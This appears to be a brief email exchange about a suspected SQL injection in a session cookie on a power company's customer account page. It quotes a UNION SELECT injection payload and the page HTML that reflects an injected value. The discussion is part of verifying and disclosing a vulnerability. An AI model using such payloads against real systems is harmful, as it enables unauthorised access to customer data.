Hi,
This is the HTML from a manual request with sesh cookie set
to ')%20UNION%20select%201,2,3,4%20--%20
My Account - Customer Care Centre - Acme Power Co
Home / Login -
My Account -
Contact Support -
CCC
Opening Hours -
Logout;
Hi, 2! Have a token: 86a2
Hi Stephen.
>From this traffic file it's not really clear if this is exploitable by any
mean more than time-based.
Could you please send the response you get when you "manually exploit" it
with the payload you've mentioned:
"sesh=')%20UNION%20select%201,2,3,4%20--%20" ?
Kind regards,
Miroslav St
